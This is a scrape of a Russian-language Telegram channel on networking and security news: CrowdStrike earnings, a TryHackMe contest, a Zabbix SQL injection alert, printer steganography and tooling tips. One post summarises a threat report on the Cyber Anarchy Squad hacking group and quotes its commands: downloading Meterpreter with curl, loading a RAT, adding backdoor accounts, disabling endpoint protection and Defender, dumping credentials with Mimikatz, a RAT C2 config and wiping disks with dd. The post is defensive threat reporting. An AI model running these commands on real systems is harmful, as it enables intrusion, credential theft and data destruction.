Mikrotik Ninja
3.84K subscribers
353 photos
8 videos
56 files
1.17K links
Канал по новым компьютерным технологиям и защите компьютерных программ


Блог http://bubnovd.net
https://medium.com/@dbubnov
https://xakep.ru/author/bubnovd/
Мысли неглупых людей https://t.me/channel1name
Книги https://t.me/mreadninja
Download Telegram
КОСЯК ТЫСЯЧЕЛЕТИЯ!
ДЕСЯТКИ ТЫСЯЧ КОМПОВ ЛЕЖАТ!
АЭРОПОРТЫ НЕ ФУНКЦИОНИРУЮТ!
КО-КО-КО
РЕПУТАЦИЯ КОМПАНИИ НА НУЛЕ
CrowdStrike разорится

Тем временем CrowdStrike:
Forwarded from 42 секунды
WSJ: CrowdStrike сообщает про рост квартальной выручки и повышает прогноз на весь год

– Выручка CrowdStrike выросла на 29%, до $1,01 млрд
– Аналитики ожидали, что выручка будет $982,8 млн
– Квартальный убыток CrowdStrike составил $16,8 млн
– Годом ранее компания показала прибыль $26,7 млн
– Показатель ARR увеличился на 27%, до $4,02 млрд
– Выручка за новый квартал будет $1,03-1,04 млрд
– По итогам всего года она будет $3,92-3,93 млрд
– Прошлый прогноз CrowdStrike был $3,89-3,9 млрд
– CrowdStrike основали бывшие руководители McAfee
– Почти 300 компаний из Fortune 500 стали клиентами

@ftsec
На TryHackMe стартанул очередной рождественский конкурс Advent of Cyber 2024

В игровой форме нам предлагают спасти Санта Клауса и Рождество от рук злых хакеров. Я каждый год участвую в этом конкурсе и призываю всех присоединиться. Очень интересные задания, знакомство с ИБ с разных сторон, знаний в ИТ и ИБ не требуется - всё объяснят с самого начала. Участие бесплатное
Forwarded from linkmeup
Selectel Network MeetUp#11: о вендоре на букву М
 
12 декабря Selectel проведет Network MeetUp о том, что мучительно знакомо каждому сетевому инженеру. Обсудят использование оборудования на букву «М», его плюсы и минусы, а также кейсы его применения применения.
 
В программе мероприятия четыре доклада:
 
● М***k у небольшого оператора связи
● М***k в проде Selectel
● Умные сетевые карты
● От идеи до макета: продукт по Agile
 
Офлайн участников также ждет:
— Настройка сетевого оборудования на скорость
— Фото и мем зоны
— Голосование за наиболее популярный способ управления M***k
 
Приходите офлайн в офис Selectel в Санкт-Петербурге или подключайтесь онлайн.
 
Мероприятие бесплатное. Посмотреть программу митапа и зарегистрироваться: https://slc.tl/bi81n

Реклама, АО «Селектел», ИНН: 7810962785, ERID: 2VtzqwRvNQG
Linux Foundation раздает скидки на курсы и сертификаты. Халява закончится 11 декабря. Успевайте
Надоело скачивать софт на винду в интернете?
scoop.sh - пакетный менеджер

> scoop search python
Results from local buckets...

Name Version Source Binaries
---- ------- ------ --------
python 3.10.5 main
winpython 3.10.4.0 main

> scoop install python
...
Creating shim for 'python.exe'.
'python' (3.10.5) was installed successfully!
Forwarded from Кибердом
Как связаны принтеры и стеганография?

Оказывается, напрямую. Принтеры умеют оставлять скрытые метки на каждом распечатанном листе. Такая технология и называется стеганографией, а её идея далеко не нова — вспомните картины Леонардо да Винчи, где до сих пор находят скрытые послания.

В 1992 году компания Xerox придумала, как применить это для безопасности, и запатентовала способ маркировки документов. Его назвали Machine Identification Code (MIC). Если проще — «жёлтые точки». Позже этот подход стали использовать и другие производители принтеров.

🔓 Как это работает?

На листе размещаются едва заметные жёлтые точки, с помощью которых можно определить серийный номер принтера, модель устройства, дату и время печати.

Проверить их наличие просто: энтузиасты из Германии создали сервис Dotspotter, куда можно загрузить скан документа и узнать, есть ли на нём такие метки. Это отличный способ проверить, маркирует ли ваш принтер документы без вашего ведома.

🦖 А студенты из Технического университета Дрездена пошли дальше и разработали фреймворк DEDA для выявления каналов утечки данных и обеспечения безопасности. С его помощью можно:
1. Находить такие точки в документах.
2. «Замусоривать» метки вашего принтера, чтобы никто не смог их использовать.
3. Создавать свои собственные метки, чтобы отследить, куда дальше попадут ваши документы.

Теперь вы знаете, что скрытые механизмы принтеров — это не просто технологии из прошлого, а мощный инструмент для предотвращения утечек и обеспечения конфиденциальности. Расскажите в комментариях, знали о таком способе защиты информации?


#без_бюджетов #Дмитрий_Борощук

🏠 Кибердом & Бизнес
Please open Telegram to view this post
VIEW IN TELEGRAM
SQL Injection в Zabbix с CVSS 9.9
Пора обновляться!
Эффект ложного консе́нсуса — это склонность проецировать свой способ мышления на других людей

Так произошло и со мной. Около десяти лет назад я где-то увидел удобный способ вставки текста из буфера в консоли Linux и пользовался этим способом каждый день, наивно полагая, что всем вокруг это известно и никто даже не задумывается о том, чтобы открыть vim или другой редактор перед созданием файла.

Вчера я понял, что эта магия известна не каждому. Поэтому решил поделиться ей с вами. Итак, чтобы вставить в файл из буфера обмена в терминале надо сделать:

cat > filename
Ctrl + V
Enter
Ctrl + C


UPD: естественно, в буфере должен быть какой-то текст перед нажатием Ctrl + V
Курс Large Language Model Agents
Сам курс уже заканчивается, но лекции и слайды доступны

- Foundation of LLMs
- Reasoning
- Planning, tool use
- LLM agent infrastructure
- Retrieval-augmented generation
- Code generation, data science
- Multimodal agents, robotics
- Evaluation and benchmarking on agent applications
- Privacy, safety and ethics
- Human-agent interaction, personalization, alignment
- Multi-agent collaboration

#LLM #course
Про "колл-центры" сбера
https://promo.sber.ru/kibrary/assets/berdyansk.pdf
Falcosidekick - коннектор Falco (eBPF аудит сисколов) ко всему на свете - позволит отправлять уведомленния о событиях в мессенджеры, БД, Jira, да куда угодно

И falcosidekick-ui - UI к нему

#falco #security
Сквозь тени анархии: разбираем атаки Cyber Anarchy Squad

Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.

2. Execution (Выполнение):
- Запуск команд через MS SQL: cmd.exe /c
-Процесс cmd.exe запускается как дочерний процесс sqlservr.exe
- Запуск PowerShell-скриптов:
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1

-Загрузка обратной оболочки Meterpreter через c URL:
cmd.exe" /c cd %appdata% && dir && curl -O [URL]/sdc.exe


-Запуск Revenge RAT через PowerShell:
powershell.exe -WindowStyle Hidden -NoExit -Command 
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\<exe_name>.exe').EntryPoint.Invoke($null, @())



3. Persistence (Закрепление):
-Создание учетных записей:
net user admin cas /add
net user admin admin123123123 /add

-Автозапуск через реестр:
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("rpchost", "\"C:\\Windows\\System32\\rpchost.exe\"");

-Создание службы для RAT:
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null);


4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
 $guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value }
msiexec.exe /x $guid /quiet

-Добавление исключений Windows Defender:
powershell Add-MpPreference -ExclusionPath '$windir\$system32'

- Имитация системных процессов:
С:\Windows\System32\svxhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe



5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей): sekurlsa::logonpasswords


6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
 net user
systeminfo
net localgroup
cd %appdata% && whoami

WMI-запросы:
 SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor



7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}


8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
 dd if=/dev/zero of=/dev/[VOLUME] bs=4M


Выжимку по командам стащил из Linkedin

#security #report
Отставить панику!
Всё обязательно починят
Ходят слухи, что в RouterOS завезут EVPN
https://forum.mikrotik.com/viewtopic.php?t=214071#p1120894
У avito есть классная репа - справочник по работе в ИТ команде. Среди прочего в ней есть описание грейдов инженеров. Полезно для понимания как и куда расти